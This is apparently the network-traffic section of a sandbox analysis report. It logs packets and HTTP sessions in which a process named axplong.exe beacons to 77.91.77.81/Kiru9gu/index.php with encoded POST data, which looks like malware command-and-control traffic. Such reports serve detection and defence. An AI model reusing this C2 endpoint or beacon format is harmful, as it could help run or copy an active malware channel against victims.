Jul 2, 2024 00:28:42.184844017 CEST	49984	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:42.274239063 CEST	49984	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:42.279165983 CEST	80	49984	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:42.492659092 CEST	80	49984	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:42.492810011 CEST	49984	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:42.610955954 CEST	49984	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:42.611334085 CEST	49985	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:42.617532969 CEST	80	49985	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:42.617717981 CEST	80	49984	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:42.617748022 CEST	49985	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:42.617966890 CEST	49985	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:42.618119955 CEST	49984	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:42.624500990 CEST	80	49985	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:43.325128078 CEST	80	49985	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:43.325192928 CEST	49985	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:43.329984903 CEST	49985	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:43.330519915 CEST	49986	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:43.336833954 CEST	80	49985	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:43.336982012 CEST	80	49986	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:43.337255001 CEST	49985	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:43.337286949 CEST	49986	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:43.338071108 CEST	49986	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:43.344592094 CEST	80	49986	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:44.058260918 CEST	80	49986	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:44.061297894 CEST	49986	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:44.166335106 CEST	49987	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:44.166332960 CEST	49986	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:44.173254967 CEST	80	49987	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:44.173399925 CEST	49987	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:44.173472881 CEST	80	49986	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:44.173552990 CEST	49986	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:44.173639059 CEST	49987	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:44.178397894 CEST	49987	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:44.179904938 CEST	80	49987	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:44.180026054 CEST	49987	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:44.185121059 CEST	49988	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:44.191623926 CEST	80	49988	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:44.191734076 CEST	49988	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:44.192132950 CEST	49988	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:44.198432922 CEST	80	49988	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:44.924001932 CEST	80	49988	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:44.924062967 CEST	49988	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:45.489262104 CEST	49988	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:45.489690065 CEST	49989	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:45.496062040 CEST	80	49988	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:45.496104956 CEST	49988	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:45.496203899 CEST	80	49989	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:45.496274948 CEST	49989	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:45.496596098 CEST	49989	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:45.502847910 CEST	80	49989	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:46.182977915 CEST	80	49989	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:46.183039904 CEST	49989	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:46.187092066 CEST	49989	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:46.187577963 CEST	49990	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:46.193500996 CEST	80	49989	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:46.193552017 CEST	49989	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:46.193708897 CEST	80	49990	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:46.193808079 CEST	49990	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:46.194000006 CEST	49990	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:46.200408936 CEST	80	49990	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:46.896704912 CEST	80	49990	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:46.899214029 CEST	49990	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:47.009382963 CEST	49991	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:47.009383917 CEST	49990	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:47.014290094 CEST	80	49991	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:47.014374971 CEST	49991	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:47.014507055 CEST	80	49990	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:47.014698982 CEST	49991	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:47.014780045 CEST	49990	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:47.019426107 CEST	80	49991	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:47.759388924 CEST	80	49991	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:47.761287928 CEST	49991	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:47.764305115 CEST	49991	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:47.764305115 CEST	49992	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:47.770742893 CEST	80	49992	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:47.771168947 CEST	80	49991	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:47.771270037 CEST	49991	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:47.771270037 CEST	49992	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:47.771559000 CEST	49992	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:47.778217077 CEST	80	49992	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:48.476283073 CEST	80	49992	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:48.476351976 CEST	49992	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:48.606970072 CEST	49992	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:48.607425928 CEST	49993	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:48.612293005 CEST	80	49993	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:48.612355947 CEST	49993	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:48.612411976 CEST	80	49992	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:48.612459898 CEST	49992	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:48.612659931 CEST	49993	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:48.617357016 CEST	80	49993	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:49.297830105 CEST	80	49993	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:49.297988892 CEST	49993	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:49.300777912 CEST	49993	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:49.301434040 CEST	49994	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:49.305921078 CEST	80	49993	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:49.306247950 CEST	80	49994	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:49.306320906 CEST	49993	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:49.306320906 CEST	49994	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:49.306775093 CEST	49994	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:49.311573982 CEST	80	49994	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:50.005844116 CEST	80	49994	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:50.005903959 CEST	49994	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:50.118505955 CEST	49994	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:50.118812084 CEST	49995	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:50.123864889 CEST	80	49995	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:50.123938084 CEST	49995	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:50.124048948 CEST	80	49994	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:50.124094009 CEST	49994	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:50.124279022 CEST	49995	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:50.129487038 CEST	80	49995	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:50.811599016 CEST	80	49995	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:50.813220978 CEST	49995	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:50.816736937 CEST	49995	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:50.816749096 CEST	49996	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:50.823692083 CEST	80	49995	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:50.824018002 CEST	80	49996	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:50.824139118 CEST	49995	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:50.824145079 CEST	49996	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:50.833441973 CEST	49996	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:50.840538025 CEST	80	49996	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:51.531902075 CEST	80	49996	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:51.532042980 CEST	49996	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:51.678461075 CEST	49996	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:51.679337025 CEST	49997	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:51.686446905 CEST	80	49997	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:51.686656952 CEST	49997	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:51.686794043 CEST	80	49996	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:51.686856031 CEST	49996	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:51.687342882 CEST	49997	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:51.694067955 CEST	80	49997	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:52.395087957 CEST	80	49997	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:52.395159960 CEST	49997	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:52.399256945 CEST	49997	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:52.399669886 CEST	49998	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:52.406471968 CEST	80	49998	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:52.406568050 CEST	49998	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:52.406728029 CEST	80	49997	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:52.406773090 CEST	49997	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:52.406886101 CEST	49998	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:52.413587093 CEST	80	49998	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:53.109992981 CEST	80	49998	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:53.110141039 CEST	49998	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:53.229587078 CEST	49998	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:53.229595900 CEST	49999	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:53.234498024 CEST	80	49999	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:53.234627008 CEST	49999	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:53.234683037 CEST	80	49998	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:53.234791040 CEST	49998	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:53.235006094 CEST	49999	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:53.239958048 CEST	80	49999	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:53.924170017 CEST	80	49999	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:53.924231052 CEST	49999	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:53.928137064 CEST	49999	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:53.928652048 CEST	50000	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:53.933129072 CEST	80	49999	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:53.933182955 CEST	49999	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:53.933425903 CEST	80	50000	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:53.933494091 CEST	50000	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:53.933823109 CEST	50000	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:53.938524008 CEST	80	50000	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:54.633516073 CEST	80	50000	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:54.633585930 CEST	50000	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:54.824258089 CEST	50000	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:54.824563980 CEST	50001	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:54.831758022 CEST	80	50000	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:54.831820011 CEST	50000	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:54.832104921 CEST	80	50001	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:54.832180977 CEST	50001	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:54.833502054 CEST	50001	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:54.841136932 CEST	80	50001	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:55.538207054 CEST	80	50001	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:55.538302898 CEST	50001	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:55.542568922 CEST	50001	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:55.542958975 CEST	50002	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:55.547709942 CEST	80	50001	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:55.547750950 CEST	80	50002	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:55.547795057 CEST	50001	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:55.547826052 CEST	50002	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:55.548178911 CEST	50002	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:55.552967072 CEST	80	50002	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:56.247020006 CEST	80	50002	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:56.247087002 CEST	50002	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:56.369894028 CEST	50002	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:56.370275974 CEST	50003	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:56.376849890 CEST	80	50002	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:56.376868963 CEST	80	50003	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:56.376903057 CEST	50002	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:56.376969099 CEST	50003	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:56.377110958 CEST	50003	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:56.384115934 CEST	80	50003	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:57.085580111 CEST	80	50003	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:57.085680008 CEST	50003	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:57.089101076 CEST	50003	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:57.089102030 CEST	50004	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:57.096005917 CEST	80	50004	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:57.096237898 CEST	80	50003	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:57.096259117 CEST	50004	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:57.096350908 CEST	50004	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:57.096574068 CEST	50003	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:57.103410959 CEST	80	50004	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:57.814265013 CEST	80	50004	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:57.814321995 CEST	50004	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:57.932241917 CEST	50004	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:57.932573080 CEST	50005	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:57.939368963 CEST	80	50004	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:57.939420938 CEST	50004	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:57.939651012 CEST	80	50005	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:57.939724922 CEST	50005	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:57.939908981 CEST	50005	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:57.948618889 CEST	80	50005	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:58.649492025 CEST	80	50005	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:58.649565935 CEST	50005	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:58.660300016 CEST	50005	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:58.660746098 CEST	50006	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:58.665488958 CEST	80	50005	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:58.665541887 CEST	50005	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:58.665915966 CEST	80	50006	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:58.665981054 CEST	50006	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:58.666245937 CEST	50006	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:58.672257900 CEST	80	50006	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:59.369877100 CEST	80	50006	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:59.369970083 CEST	50006	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:59.478116035 CEST	50006	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:59.478127003 CEST	50007	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:59.483072042 CEST	80	50007	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:59.483352900 CEST	50007	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:59.483844995 CEST	50007	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:59.489546061 CEST	80	50007	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:59.499805927 CEST	80	50006	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:59.499929905 CEST	50006	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:29:00.202559948 CEST	80	50007	77.91.77.81	192.168.2.4
Jul 2, 2024 00:29:00.202617884 CEST	50007	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:29:01.320354939 CEST	50007	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:29:01.320844889 CEST	50008	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:29:01.325427055 CEST	80	50007	77.91.77.81	192.168.2.4
Jul 2, 2024 00:29:01.325489998 CEST	50007	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:29:01.325767994 CEST	80	50008	77.91.77.81	192.168.2.4
Jul 2, 2024 00:29:01.325828075 CEST	50008	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:29:01.326344967 CEST	50008	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:29:01.331478119 CEST	80	50008	77.91.77.81	192.168.2.4
Jul 2, 2024 00:29:02.032885075 CEST	80	50008	77.91.77.81	192.168.2.4
Jul 2, 2024 00:29:02.033091068 CEST	50008	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:29:02.150072098 CEST	50008	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:29:02.151128054 CEST	50009	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:29:02.155227900 CEST	80	50008	77.91.77.81	192.168.2.4
Jul 2, 2024 00:29:02.155302048 CEST	50008	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:29:02.155913115 CEST	80	50009	77.91.77.81	192.168.2.4
Jul 2, 2024 00:29:02.156058073 CEST	50009	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:29:02.160914898 CEST	50009	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:29:02.165891886 CEST	80	50009	77.91.77.81	192.168.2.4
Jul 2, 2024 00:29:02.858694077 CEST	80	50009	77.91.77.81	192.168.2.4
Jul 2, 2024 00:29:02.858763933 CEST	50009	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:29:02.861663103 CEST	50009	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:29:02.861969948 CEST	50010	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:29:02.866857052 CEST	80	50009	77.91.77.81	192.168.2.4
Jul 2, 2024 00:29:02.866920948 CEST	80	50010	77.91.77.81	192.168.2.4
Jul 2, 2024 00:29:02.866928101 CEST	50009	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:29:02.866985083 CEST	50010	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:29:02.867269039 CEST	50010	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:29:02.872035027 CEST	80	50010	77.91.77.81	192.168.2.4
Jul 2, 2024 00:29:03.576337099 CEST	80	50010	77.91.77.81	192.168.2.4
Jul 2, 2024 00:29:03.576395988 CEST	50010	80	192.168.2.4	77.91.77.81

HTTP Request Dependency Graph

77.91.77.81

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:25:04.486423016 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:25:05.210973024 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 2, 2024 00:25:05.212826014 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:25:05.442384958 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:25:05.560897112 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:25:06.259165049 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 2, 2024 00:25:06.260385990 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:25:06.476042986 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49732	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:25:06.612632990 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:25:07.334412098 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
